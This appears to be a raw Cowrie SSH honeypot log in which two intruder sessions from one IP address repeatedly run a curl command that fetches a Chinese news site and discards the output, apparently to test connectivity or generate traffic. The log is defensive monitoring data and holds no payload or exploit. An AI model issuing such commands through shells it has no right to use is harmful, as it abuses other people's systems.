{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.551351Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.552157Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.564811Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.565755Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.580016Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.584540Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.593667Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.594625Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.601001Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.601753Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.608042Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.635443Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.636350Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.639148Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.639916Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.678438Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.679702Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.683789Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.684732Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.700804Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.717151Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.718011Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.723945Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.725014Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.729692Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.754395Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.756283Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.762490Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.765359Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.766354Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.780123Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.799591Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.800638Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.820309Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.822253Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.824895Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.825867Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.839749Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.842304Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.856307Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.857421Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.867111Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.868091Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.897970Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.899080Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.911097Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.912349Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.918084Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.937757Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.938780Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.955073Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.955998Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.977414Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.978385Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:37.998289Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:37.999431Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.008891Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.017503Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.018274Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.022148Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.041267Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.042283Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.049077Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.056521Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.057352Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.084995Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.086101Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.096005Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.097154Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.129220Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.130550Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.133841Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.134910Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.169569Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.170813Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.173360Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.174551Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.197052Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.208475Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.209675Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.213807Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.214848Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.239106Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.251854Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.252873Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.255143Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.256031Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.280090Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.288723Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.289739Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.308188Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.309636Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.334743Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.340511Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.341388Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.349135Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.350222Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.380748Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:38.382036Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:38.391628Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
